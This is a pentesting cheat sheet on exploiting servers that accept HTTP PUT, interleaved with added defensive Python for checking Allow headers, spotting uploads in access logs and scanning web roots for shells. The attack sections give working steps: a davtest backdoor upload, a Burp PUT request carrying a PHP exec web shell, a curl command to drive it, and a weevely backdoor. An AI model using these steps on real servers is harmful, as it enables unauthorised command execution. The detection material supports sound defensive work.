Detection of vulnerability
Run Nikto:
nikto --host <target ip>:<target port>
If it returns this:
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
You are potentially in business.
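The Nikto finding above comes down to one thing: the server honours write-capable methods. The script below is an added example, not part of the original cheat sheet, that confirms the same exposure from the Allow header of an OPTIONS reply. Its parsing and classification are pure functions run here against a constructed OPTIONS response; `probe()` wraps them for a live check against a URL you administer (the URL is an assumed parameter).

```python
"""Flag write-capable HTTP methods advertised by a web server (added example).

The sample response is constructed for this example; probe() performs the live
OPTIONS request against a URL you own (assumed parameter).
"""
import urllib.error
import urllib.request

# Methods that let a client create, change or remove server-side resources.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
# Methods that disclose structure or echo requests (PROPFIND lists WebDAV trees, TRACE echoes headers).
DISCLOSURE_METHODS = {"PROPFIND", "TRACE"}

# Constructed OPTIONS reply, shaped like one from a server with PUT/DELETE/WebDAV enabled.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Fri, 17 Feb 2017 22:27:30 GMT\r\n"
    "Server: Apache\r\n"
    "Allow: GET,HEAD,POST,OPTIONS,PUT,DELETE,PROPFIND\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_allow(header_value):
    """Turn 'GET, HEAD, PUT' (Allow or Public header) into a set of upper-case method names."""
    if not header_value:
        return set()
    return {tok.strip().upper() for tok in header_value.split(",") if tok.strip()}


def parse_raw_response(raw):
    """Split a raw HTTP response into (status code, lower-cased header dict); the body is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def assess_allow(header_value):
    """Classify advertised methods; 'risky' is True when any write-capable method is present."""
    methods = parse_allow(header_value)
    write = sorted(methods & WRITE_METHODS)
    disclosure = sorted(methods & DISCLOSURE_METHODS)
    benign = sorted(methods - WRITE_METHODS - DISCLOSURE_METHODS)
    return {"write": write, "disclosure": disclosure, "benign": benign, "risky": bool(write)}


def assess_raw_response(raw):
    """Assess a captured OPTIONS reply (status line + headers) such as SAMPLE_OPTIONS_RESPONSE."""
    status, headers = parse_raw_response(raw)
    report = assess_allow(headers.get("allow"))
    report["status"] = status
    return report


def probe(url, timeout=5):
    """Live check: send OPTIONS to a URL you administer and assess its Allow header."""
    req = urllib.request.Request(url, method="OPTIONS")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            allow = resp.headers.get("Allow")
    except urllib.error.HTTPError as err:
        allow = err.headers.get("Allow")  # 4xx/5xx replies still carry headers
    return assess_allow(allow)


if __name__ == "__main__":
    report = assess_raw_response(SAMPLE_OPTIONS_RESPONSE)
    print("write-capable:", report["write"], "disclosure:", report["disclosure"])
    # probe("http://<target ip>:<target port>/") runs the same assessment live
```

Allow is what the server advertises, not what it enforces, so a clean OPTIONS reply is a hint rather than proof; a disposable write test such as the one davtest performs settles it. On the fixing side, the method set is restricted in the server configuration (Apache's `<LimitExcept GET POST HEAD>` with `Require all denied`, nginx's `limit_except`), and any WebDAV location that genuinely needs PUT gets authentication in front of it.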
Use davtest to get a backdoor
This tool runs all of the payloads that it has, sends backdoors if exploitation is successful, and cleans up after itself.
davtest -url "http://${TARGET_IP}:${TARGET_PORT}" -sendbd auto -cleanup
PHP Backdoor with Burp
Capture a request and send it to Repeater. Change the method to PUT and add some PHP code to the bottom of the request. It should look roughly like this:
PUT /test.php HTTP/1.1
Host: <target ip>:<target port>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 17 Feb 2017 22:27:30 GMT
If-None-Match: "18518f6-5a9-548c16b5e72ae"
Cache-Control: max-age=0
Content-Length: 50
<?php
echo exec($_GET[cmd]);
?>
If the backdoor is successfully landed, you can run commands on the underlying system:
CMD=whoami
curl "http://${TARGET_IP}:${TARGET_PORT}/test.php?cmd=${CMD}"
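Each step of the walkthrough above leaves a line in the web server's access log: the PUT that lands test.php, the GET with a cmd parameter that runs it, and the eventual DELETE. The detector below is an added example, not part of the original cheat sheet; it parses combined-format log lines (the sample lines are constructed to mirror that sequence) and raises one alert per write request or per request to a file that an earlier PUT created.

```python
"""Detect accepted PUT/DELETE requests and later use of uploaded files in access logs.

Added example; the log lines are constructed in Apache/nginx combined format.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: OPTIONS probe, PUT of a script, execution via GET, a benign PUT,
# normal traffic, a rejected PUT from another client, and the cleanup DELETE.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Feb/2017:22:31:02 +0000] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0"',
    '10.0.0.5 - - [17/Feb/2017:22:31:09 +0000] "PUT /test.php HTTP/1.1" 201 153 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [17/Feb/2017:22:31:20 +0000] "GET /test.php?cmd=whoami HTTP/1.1" 200 12 "-" "curl/7.52.1"',
    '10.0.0.5 - - [17/Feb/2017:22:32:00 +0000] "PUT /notes.txt HTTP/1.1" 201 40 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [17/Feb/2017:22:35:41 +0000] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [17/Feb/2017:22:36:10 +0000] "PUT /x.php HTTP/1.1" 405 - "-" "Mozilla/5.0"',
    '10.0.0.5 - - [17/Feb/2017:22:40:00 +0000] "DELETE /test.php HTTP/1.1" 204 - "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL"}
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".jsp", ".jspx", ".asp", ".aspx", ".cgi", ".pl"}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"], rec["query"] = parts.path, parts.query
    return rec


def is_script(path):
    """True when the request path ends in an extension the server would execute."""
    dot = path.rfind(".")
    return dot != -1 and path[dot:].lower() in SCRIPT_EXTS


def detect(lines):
    """Return alerts for write requests and for requests to paths created by an accepted PUT."""
    alerts = []
    uploaded = {}  # path -> ip of the client whose PUT succeeded
    for lineno, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        ok = 200 <= rec["status"] < 300
        reason = None
        if rec["method"] in WRITE_METHODS:
            if not ok:
                reason = "write_rejected"  # probing even when the server refuses
            elif rec["method"] == "PUT":
                uploaded[rec["path"]] = rec["ip"]
                reason = "script_upload" if is_script(rec["path"]) else "file_upload"
            elif rec["method"] == "DELETE":
                reason = "file_delete"
            else:
                reason = "webdav_write"
        elif ok and rec["path"] in uploaded:
            # A query string or POST body to a file someone just PUT is the command channel.
            executed = bool(rec["query"]) or rec["method"] == "POST"
            reason = "uploaded_file_executed" if executed else "uploaded_file_accessed"
        if reason:
            alerts.append({"line": lineno, "ip": rec["ip"], "method": rec["method"],
                           "path": rec["path"], "status": rec["status"], "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The `uploaded` map is what makes the third line interesting: a GET with a query string is unremarkable on its own, but a GET to a path that the same log shows being created by PUT is the shell being driven. In production the map should be keyed per virtual host and persisted across log rotations, because the PUT and the first use can be days apart.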
Create a backdoor with weevely and upload it with poster
Start by installing the Poster add-on for Firefox.
Next, spawn a backdoor with weevely:
BACKDOOR_PW='evil'
BACKDOOR_PATH='/root/back.php'
weevely generate "${BACKDOOR_PW}" "${BACKDOOR_PATH}"
Go ahead and upload this shell using the PUT method with Poster by setting the following fields:
URL: http://<target ip>:<target port>/back.php
File: /root/back.php
and then clicking the PUT button.
Now access the backdoor like so:
weevely "http://${TARGET_IP}:${TARGET_PORT}/back.php" evil
Cleanup
Once you’re done, delete the backdoor using the DELETE method with Poster (specify DELETE in the dropdown and click the green button).
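Whether or not the tester remembered this step, the defender's counterpart is to look for what was left behind. The scanner below is an added example, not part of the original cheat sheet: it walks a web root for script files that either hand request input straight to a command-execution sink (the shape of the test.php above) or hide their payload behind decoders and eval(), the shape of typical generated agents, and notes recent modification as a weaker third signal. `scan_sample_webroot()` builds a constructed web root in a temporary directory so the scanner can be exercised offline.

```python
"""Scan a web root for files that look like PUT-uploaded web shells (added example).

scan_sample_webroot() constructs a throwaway web root for demonstration; point
scan_webroot() at a real document root to use it.
"""
import os
import re
import tempfile
import time
from pathlib import Path

SCRIPT_EXTS = {".php", ".phtml", ".php5", ".jsp", ".jspx", ".asp", ".aspx"}
# Command-execution / code-evaluation sinks.
SINK_RE = re.compile(r"\b(exec|shell_exec|system|passthru|popen|proc_open|eval|assert)\s*\(", re.I)
# Request-controlled input that would feed such a sink.
SOURCE_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b|php://input", re.I)
# Decoders commonly wrapped around a hidden payload before eval().
DECODER_RE = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)


def scan_file(path, now, max_age_days=7):
    """Return the list of indicators found in one script file (empty when clean)."""
    text = Path(path).read_text(errors="replace")
    findings = []
    has_sink = SINK_RE.search(text) is not None
    if has_sink and SOURCE_RE.search(text):
        findings.append("request_to_exec")
    if has_sink and DECODER_RE.search(text):
        findings.append("obfuscated_payload")
    if now - os.path.getmtime(path) < max_age_days * 86400:
        findings.append("recently_modified")
    return findings


def scan_webroot(root, now=None, max_age_days=7):
    """Map relative path -> findings for every script file under root that has any."""
    now = time.time() if now is None else now
    root = Path(root)
    results = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in SCRIPT_EXTS:
            findings = scan_file(p, now, max_age_days)
            if findings:
                results[str(p.relative_to(root))] = findings
    return results


def scan_sample_webroot():
    """Build a constructed web root (two shells, one clean page, one text file) and scan it."""
    now = time.time()
    samples = {  # name -> (content, mtime); the base64 string decodes to a harmless 'echo 1;'
        "test.php": ("<?php\necho exec($_GET['cmd']);\n?>\n", now - 3600),
        "back.php": ("<?php eval(base64_decode('ZWNobyAxOw==')); ?>\n", now - 3600),
        "index.php": ("<?php echo 'hello'; ?>\n", now - 30 * 86400),
        "notes.txt": ("exec($_GET['cmd']) in a text file is not executable\n", now - 3600),
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, (content, mtime) in samples.items():
            path = Path(tmp) / name
            path.write_text(content)
            os.utime(path, (mtime, mtime))
        return scan_webroot(tmp, now=now)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print(scan_webroot(target) if target else scan_sample_webroot())
```

The age signal is deliberately reported alongside the content signals rather than on its own: right after a deployment every file is recent, so compare against the last known deploy time, and treat a recent file that also carries `request_to_exec` or `obfuscated_payload` as the one to pull for review.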
Resources:
- https://www.youtube.com/watch?v=vjatR1BKHO8
- https://www.youtube.com/watch?v=Pb6Nd7Cl5XM&t=82s
- https://www.youtube.com/watch?v=mgXWZVJ47qU
- https://www.sans.org/reading-room/whitepapers/testing/penetration-testing-web-application-dangerous-http-methods-33945
- http://www.smeegesec.com/2014/10/detecting-and-exploiting-http-put-method.html
- http://niiconsulting.com/checkmate/2014/04/owning-enterprise-http-put/